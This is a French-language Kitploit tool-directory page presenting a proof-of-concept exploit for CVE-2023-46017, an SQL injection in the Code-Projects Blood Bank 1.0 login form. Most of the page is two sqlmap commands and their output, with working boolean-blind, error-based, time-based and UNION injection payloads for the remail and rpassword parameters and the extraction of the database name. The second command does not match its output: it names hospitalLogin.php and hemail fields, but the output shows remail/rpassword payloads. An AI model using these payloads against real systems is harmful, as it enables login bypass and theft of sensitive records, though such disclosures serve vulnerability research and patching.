Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability — Exploit de preuve de concept pour l'injection SQL dans Code-Projects Blood Bank V1.0. Démontre le contournement d'authentification et l'extraction de base de données via les paramètres vulnérables remail et rpassword dans receiverLogin.php. | Kitploit
Outils/GitHubGitHub/ersinerenler/cve-2023-46017-code-projects-blood-bank-1.0-sql-injection-vulnerability
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubersinerenler/cve-2023-46017-code-projects-blood-bank-1.0-sql-injection-vulnerability

CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

Exploit de preuve de concept pour l'injection SQL dans Code-Projects Blood Bank V1.0. Démontre le contournement d'authentification et l'extraction de base de données via les paramètres vulnérables remail et rpassword dans receiverLogin.php.

Voir le dépôt
3il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-46017-Code-Projects-Blood-Bank-1.0-Vulnérabilité-d'Injection-SQL

  • Auteur de l'exploit : ersinerenler

Page d'accueil du fournisseur

  • https://code-projects.org/blood-bank-in-php-with-source-code

Lien du logiciel

  • https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip

Aperçu

  • Code-Projects Blood Bank V1.0 est susceptible à une vulnérabilité de sécurité importante qui découle d'une protection insuffisante sur les paramètres 'remail' et 'rpassword' dans le fichier receiverLogin.php. Cette faille peut potentiellement être exploitée pour injecter des requêtes SQL malveillantes, conduisant à un accès non autorisé et à l'extraction d'informations sensibles de la base de données.

Détails de la vulnérabilité

  • ID CVE : CVE-2023-46017
  • Version affectée : Blood Bank V1.0
  • Fichier vulnérable : /receiverLogin.php
  • Noms des paramètres : remail, rpassword
  • Type d'attaque : Local
  • Références :

    • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46017
    • https://nvd.nist.gov/vuln/detail/CVE-2023-46017

    Description

    • L'absence de validation et d'assainissement appropriés des entrées sur les paramètres 'remail' et 'rpassword' permet à un attaquant de créer des requêtes d'injection SQL, contournant les mécanismes d'authentification et obtenant un accès non autorisé à la base de données
    image

    Preuve de concept (PoC) :

    • sqlmap -u "http://localhost/bloodbank/file/receiverLogin.php" --method POST --data "remail=test@test&rpassword=test&rlogin=Login" -p remail --risk 3 --level 5 --dbms mysql --batch --current-db
    root@kitploit:~
    ---
    Parameter: remail (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: remail=test@test' AND 1348=(SELECT (CASE WHEN (1348=1348) THEN 1348 ELSE (SELECT 5898 UNION SELECT 1310) END))-- -&rpassword=test&rlogin=Login
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: remail=test@test' OR (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(9644=9644,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HyEh&rpassword=test&rlogin=Login
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: remail=test@test' AND (SELECT 5587 FROM (SELECT(SLEEP(5)))hWQj)-- NUfN&rpassword=test&rlogin=Login
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 7 columns
        Payload: remail=test@test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x4e764e5452486270544a6e4c705a79535a667441756d556b416e7961484a534a647542597a61466f,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rpassword=test&rlogin=Login
    ---
    
    • sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p rpassword --risk 3 --level 3 --dbms mysql --batch --current-db
    root@kitploit:~
    ---
    Parameter: rpassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: remail=test@test&rpassword=test' AND 9149=(SELECT (CASE WHEN (9149=9149) THEN 9149 ELSE (SELECT 9028 UNION SELECT 5274) END))-- -&rlogin=Login
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: remail=test@test&rpassword=test' OR (SELECT 6087 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(6087=6087,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VRqW&rlogin=Login
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: remail=test@test&rpassword=test' AND (SELECT 4449 FROM (SELECT(SLEEP(5)))eegb)-- Cuoy&rlogin=Login
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 7 columns
        Payload: remail=test@test&rpassword=test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x6e686d776376736a706f47796d474a736a48566f72625a4e6d537247665a444f684154684b476d62,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rlogin=Login
    ---
    
    • base de données actuelle : bloodbank
    image
    Télécharger l’outil